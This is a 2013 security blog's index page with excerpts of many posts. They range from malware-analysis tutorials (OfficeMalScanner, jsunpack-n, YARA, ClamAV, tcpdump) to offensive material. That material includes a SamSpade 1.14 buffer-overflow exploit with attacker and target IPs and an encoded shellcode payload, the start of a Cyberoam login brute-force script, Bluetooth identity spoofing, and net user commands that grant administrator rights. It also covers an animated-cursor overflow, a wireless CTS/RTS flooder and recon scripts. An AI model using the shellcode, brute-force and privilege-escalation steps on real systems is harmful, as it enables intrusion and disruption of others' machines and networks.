Skip to main content

Posts

Showing posts from 2013

SAMSPADE BUFFER OVERFLOW VULNERABILITY

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW # Date: 10-12-2013 # Exploit Author: VISHAL MISHRA & NIDHI VERMA # Vendor Homepage: http://www.samspade.org/ # Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html # Version: 1.1.4 (beta) # Tested on: WINDOWS XP(sp2) TARGET: windows xp(sp2) ip:192.168.117.129 ATTACKER: backtrack     ip:192.168.117.131      PORT:443 Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhMYGpGpEPQpMYM5EaXRE4LKRrP0LKRrVl…

Spoofing Bluetooth Device Information

Step1: $hciconfig
Like ifconfig and iwconfig for bluetooth we have hciconfig that enumerate bluetooth interfaces in an system with a little info about that card like MAC,MTU and interface name.




Step2:$hciconfig -a hci0
So now we known we have a bluetooth interface card hci0.It may be anyone hci0,hci1 etc. Now as you can see below in the output that this bluetooth device is using OS name as its name own name. We will change this info so that some person might not enumerate any info about our bluetooth device.
                                               Class is a 24 bit or 6 hex number based identity for bluetooth devices. Class entity defines that bluetooth device is of which hardware class i.e
1)0x78020c is class of Phone/Smart phone,
2)0x6e0100 is class of computer etc.
Now will try to change this default class and name of our bluetooth device.



Step3:$hciconfig -a hci0 features
This command will tell what features our card support.



Step4: $hciconfig -a hci0 name 'aLt' class 0x…

OfficeMalScanner Tutorial

+------------------------------------------+ |           OfficeMalScanner v0.61         | |  Frank Boldewin / www.reconstructer.org  | +------------------------------------------+
Usage:
--------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug>

Options:
scan    - scan for several shellcode heuristics and encrypted PE-Files
info    - dumps OLE structures, offsets+length and saves found VB-Macro code
inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir
Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found

If you use ubuntu with wine on it then type following command in terminal "wine cmd.exe" to reach a window prompt from where you can run OfficeMalScanner


OfficeMalScanner Output


Click Hereto download test.doc

Jsunpack-n Tutorial (Analyzing Malicious Documents)

INSTALLATION:

Required Dependencies(all these dependencies are present in jsunpack-n package in a folder named depend):
1) Build and install pynids (nids) from ./depends/pynids-0.6.1.tar.gz
To compile pynids, you may need the following (ubuntu) packages:
libpcap-dev pkg-config python-dev libgtk2.0-dev libnet1-dev
        To install these package either use software center or command apt-get install PackageName

    $ cd depends
    $ tar xvfz pynids-0.6.1.tar.gz
$ cd pynids-0.6.1/ directory
$ python setup.py build
$ sudo python setup.py install

2) Build SpiderMonkey 'js' from ./depends/js-1.8.0-rc1-src.tar.gz

    This package has modifications to the spidermonkey source code; therefore, it is not recommended you use default smjs packages. (Details of the modifications are in INSTALL.spidermonkey.shellcode and INSTALL.spidermonkey, for historical purposes)

    $ cd depends/
    $ tar xvfz js-1.8.0-rc1-src.tar.gz
    $ cd js-1.8.0-rc1-src
    $ make BUILD_OPT=1 -f Makefile.ref
    The…

Cyberoam Login Brute Force Script

#
#  ('-.               .-') _                         ) (`-.               _  .-')
#  ( OO ).-.          (  OO) )                         ( OO ).            ( \( -O )
#  / . --. / ,--.     /     '._     ,------.,--. ,--. (_/.  \_)-.  .----.  ,------.
#  | \-.  \  |  |.-') |'--...__) ('-| _.---'|  | |  |  \  `.'  /  /  ..  \ |   /`. '
#.-'-'  |  | |  | OO )'--.  .--' (OO|(_\    |  | | .-') \     /\ .  /  \  .|  /  | |
# \| |_.'  | |  |`-' |   |  |    /  |  '--. |  |_|( OO ) \   \ | |  |  '  ||  |_.' |
#  |  .-.  |(|  '---.'   |  |    \_)|  .--' |  | | `-' /.'    \_)'  \  /  '|  .  '.'
#  |  | |  | |      |    |  |      \|  |_) ('  '-'(_.-'/  .'.  \  \  `'  / |  |\  \
#  `--' `--' `------'    `--'       `--'     `-----'  '--'   '--'  `---''  `--' '--'
# Cyberaom brute force Script
# @aut…

Capture Wireless Traffic

Using Tcpdump

tcpdump -i <interface> -s 0 -nne 'wlan type <type> subtype <subtype>'Note older versions of tcpdump and wireshark capture filter dosn't support the "wlan" keyword, just use "type <type> subtype <subtype>"

Sniffing wireless in monitor mode, ignore beacon's
tcpdump -i <interface> -s 0 -nne '(type mgt or type ctl or type data) and (not type mgt subtype beacon)'
typesubtypemgtassoc-reqassoc-respreassoc-reqreassoc-respprobe-reqprobe-respbeaconatimdisassocauthdeauthctlps-pollrtsctsackcf-endcf-end-ackdatadatadata-cf-ackdata-cf-polldata-cf-ack-pollnullcf-ackcf-pollcf-ack-pollqos-dataqos-data-cf-ackqos-data-cf-pollqos-data-cf-ack-pollqosqos-cf-pollqos-cf-ack-poll

Using Wireshark wlan.fc.type == 0 Manageme

Microsoft Windows 2000 IIS 5.0 IPP Vulnerability

Exploit Microsoft Windows 2000 IIS 5.0 IPP ISAPI Vulnerability


Install And Configure Yara

Step1:To Install YARA on Ubuntu we need the PCRE and some libraries first:
sudo apt-get install libpcre3 libpcre3-dev Then we start downloading the YARA source code: $ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz  $ wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz


Step2: Compile and install yara on your linux box.
a) cd yara-1.4
    chmod +x -R /root/Desktop/yara-1.4/*
   ./configure
    make
    make check
    make install

 b)cd ..
    cd yara-python-1.4
    python setup.py install




Step 3: Convert clamav database to yara
http://code.google.com/p/malwarecookbook/source/browse/trunk/3/3/clamav_to_yara.py?r=5

sigtool -u /var/lib/clamav/main.cvd                                     //decompress the database
python clamav_to_yara.py -f main.ndb -o clamav.yara    //convert clamav to yara

Step 4:For packing signature(PEID tool uses these signature to detect type of packing) go to this site and copy packer signatures in a file .Now with the help of this file we can detect p…

Clamav Tutorial

Install Clamav And Create Signatures Step1: Install clamav in ubuntu by following simple steps given below:
Edit /etc/apt/sources.list and add a line like this to it:
deb http://volatile.debian.org/debian-volatile lenny/volatile main contrib non-free
Then run apt-get update && apt-get install clamav
If you need clamd, you may also want to runapt-get install clamav-daemon

Step2:CVD (ClamAV Virus Database) is a digitally signed container that includes signature databases in various text formats. The header of the container is a 512 bytes long string with colon separated fields: ClamAV-VDB:build time:version:number of signatures:functionalitylevel required:MD5 checksum:digital signature:builder name:build time (sec)
sigtool --info displays detailed information about a given CVD file:

Signature formats:
MD5 The easiest way to create signatures for ClamAV is to use MD5 checksums, however this method can be only used against static malware.
MD5, PE section based You can create aMD5 signat…

TcpDumpTutorial

When using a tool that displays network traffic a more natural (raw) way the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite, and for this reason I strongly advocate using tcpdump instead of other tools whenever possible.
An anagram for the TCP flags: Unskilled Attackers Pester RealSecurity Folk ] Show me all URGENT (URG) packets... # tcpdump 'tcp[13] &32!=0'
Show me all ACKNOWLEDGE (ACK) packets... # tcpdump 'tcp[13] &16!=0'
Show me all PUSH (PSH) packets... # tcpdump 'tcp[13] &8!=0'
Show me all RESET (RST) packets... # tcpdump 'tcp[13] &4!=0'
Show me all SYNCHRONIZE (SYN) packets... # tcpdump 'tcp[13] &2!=0'
Show me all FINISH (FIN) packets... # tcpdump 'tcp[13] &1!=0'
Show me all SYNCHRONIZE/ACKNOWLEDGE (SYNACK) packets... # tcpdump 'tcp[13]=18' [ Note: Only the PSH, RST, SYN, and FIN flags are displayed in…

Rare Window Commands

1: Find MAC address of all available interfaces :
getmac

2: Find Version of windows Os:
ver

3: Find SID using Other method
  whoami /user




4:Find System Information
systeminfo



5:find SID of window user
wmic useraccount where name='vishal' get sid



6:Find about wireless adapter and access point available around you:
 netsh wlan show all

Different types of Cisco IOS passwords

There are three different types of Cisco IOS passwords.

1) Cisco IOS type 0 passwords There is a command in Cisco IOS that can be issued to encrypt all passwords in the configuration file. If this command is not entered into the configuration file then all passwords (except for the enable secret password) will appear as plaintext as shown below:
username admin privilege 15 password 0 cisco
From the above lines in the Cisco IOS configuration file we can see that in this example the user admin has a password of cisco. The above passwords are noted as type 0 (zero) as shown by the zero that precedes the actual password. Type 0 passwords use no encryption.

2) Cisco IOS type 7 passwords
 The command that is issued to encrypt user passwords is "service password-encryption" and this command should be entered from the Cisco router configuration mode prompt. If the "service password-encryption" command is issued then all type 0 (zero) passwords are become encrypted
 username…

Manage User Account In Command Prompt

1) Command to Find Available users on a window box:
    net user
2) Command to add a new user account with a password:
    net user /add  Lenny{username} mango{pass}
3) Command to add an user account to administrator group:
    net localgroup administrator Lenny /add
4) To give the full administrator right to the user,use following command:
    net share concfg*C:\/grant:useraccountname,full
5) The following example adds a user account for a user whose full name is Jay Jamison and whose user  account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:
 net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay  Jamison"

6) The following example sets the logon time (8 A.M. to 5 P.M.) for Lenny by using 24-hour notation:
    net user Lenny /time:M-F,08:00-17:00
7) The following example sets the logon time (8 A.M. to 5 P.M.) for Lenny by us…

Animated Cursor Vulnerability Demystified

With GS, DEP, ASLR, and protected mode IE7, it's possible to go ahead and write a functional proof of concept that will work on Vista and Xp also. When triggering the vulnerability on Vista with a complete overwrite of the return address, the register state looks something like this:

eax=5f36476f ebx=0329f278 ecx=00000000 edx=00000000 esi=0329f1f0 edi=0329f1bc
eip=41414141 esp=0329f1bc ebp=66ae6c41 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
41414141 ?? ???

One important point to note is that our malicious ani file contain two ani header one is good i.e of 36 byte and other is the bad boy that cause buffer overflow in LoadAniIcon function.The first is of 36 byte to make sure it passes the loadCursorIconfromFilemap function which checks the header of ani,but the problem is that it is called only once for a single file,if another ani header is encountered then instead of calling loadCursorIconfromFilemap loadAniIcon function  will be called…

Simple Bash Scripting

Harvesting Step 1: Download the default page of a website wget icq.com
Step2: Find All FQDN and PQDN in index.html cat index.html | grep "href=" |cut -d'/' -f3|grep icq.com|sort-u|cut -d'"' -f1 >domain.txt
Step 3: Find Ip address of all domain names which we got from the last step.To do so we will make a bash script. //findip.sh #!/bin/bash
for hostname in $(cat domain.txt); do host $hostname |cut -d' ' -f4|tr -d 'a-z' & done
Step 4: Now find whether these Ip address are alive or not.So again we will make a script that will do ping sweep. ./findip.sh >Ipaddress.txt
//FindAlive.sh #!/bin/bash
for ipaddress in $(cat Ipaddress.txt);do echo $ipaddress   $(ping $ipaddress -c 1|grep "received"|cut -d',' -f2) & done

Now lets have look to the results:->




Wireless Hacking Part -2

Wireless CTS/RTS Flooder This module sends 802.11 CTS/RTS requests to a specific wireless peer, using the specified source address.
Module Options ADDR_DST TARGET MAC (e.g 00:DE:AD:BE:EF:00) ADDR_SRC Source MAC (not needed for CTS) CHANNEL The initial channel (default: 11) DRIVER The name of the wireless driver for lorcon (default: autodetect) INTERFACE The name of the wireless interface (default: wlan0) NUM Number of frames to send (default: 100) TYPE Type of Frame (RTS, CTS) (default: RTS) VERBOSE Enable detailed status messages WORKSPACE Specify the workspace for this module
Theory RTS/CTS (Request to Send / Clear to Send) is the optional mechanism used by the 802.11 wireless networking protocol to reduce frame collisions introduced by the hidden node problem. Originally the protocol fixed the exposed node problem as well, but modern RTS/CTS includes ACKs and does not solve the exposed node problem. A node wishing to send data initiates the process by sending a Request to Send frame (RTS). The desti…